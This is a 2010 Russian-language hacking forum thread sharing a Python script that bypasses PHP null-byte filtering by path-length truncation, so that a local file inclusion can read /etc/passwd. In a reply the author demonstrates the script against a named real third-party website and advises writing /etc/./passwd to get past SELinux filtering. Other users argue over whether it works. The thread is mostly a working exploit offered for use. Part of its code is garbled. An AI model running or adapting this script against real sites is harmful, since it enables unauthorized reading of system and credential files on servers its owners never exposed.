HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Обход фильтрации нуль байта
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.09.2010, 23:58
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию
Данный метод работает во всех версиях php кроме последней 5.3.3

Смысл в том, чтобы забивать путь в начале файла произвольными символами.

Код:
Code:
#!/usr/bin/env python
# Null byte filter bypass
import urllib, sys

if len(sys.argv)  [file] [true]: "
	exit()

file = "../../../../../../../etc/passwd";
true = "root"

if len(sys.argv) > 3:
	file = sys.argv[2]
	true = sys.argv[3]

url = sys.argv[1]

for i in xrange(900, 4096):
	sys.stderr.write("\rTry: " + str(i))

	d = "t" * i
	try:
		fd = urllib.urlopen(url + d + file)
	except:
		print "Error connect"
		sys.exit(1)

	data = fd.read()
	fd.close()

	if data.find(true) > -1:
		print '\n', data
		exit(0)
 
Ответить с цитированием

  #2  
Старый 08.09.2010, 12:18
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию
На это и нацелен скрипт. чтобы обходить magic quotes.

Иначе смысл было бы создавать тред.
 
Ответить с цитированием

  #3  
Старый 09.09.2010, 02:20
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию
чё за бред, ни фига не пашет (5.2.6)
 
Ответить с цитированием

  #4  
Старый 09.09.2010, 14:28
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию
Не согласен, вполне нормально работает.

К примеру:

python fazzer.py "http://www.bela.bg/?page_id=9&article_id=1000220&coments=yes&page="

Try: 4041

Возможно у тебя selinux блочит запросы напрямую в урле, если видит /etc/passwd. Пробуй /etc/./passwd

Если не получится скинь в приват, я посмотрю.
 
Ответить с цитированием

  #5  
Старый 09.09.2010, 15:54
DrakonHaSh
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305

Репутация: 30
Отправить сообщение для DrakonHaSh с помощью ICQ
По умолчанию
все работает, ~POC:

http://devteev.blogspot.com/2010/08/null-byte.html

за реализацию спасибки
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ